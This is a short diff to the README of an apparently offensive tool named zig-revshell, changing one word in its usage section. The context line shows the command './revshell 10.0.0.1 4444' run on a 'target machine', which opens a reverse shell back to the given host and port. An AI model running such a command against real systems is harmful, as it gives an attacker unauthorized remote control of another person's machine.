hideckies/zig-revshell/README.md

 ## Usage

-Execute the revshell in your target machine:
+Execute the binary in your target machine:

 ```sh
 ./revshell 10.0.0.1 4444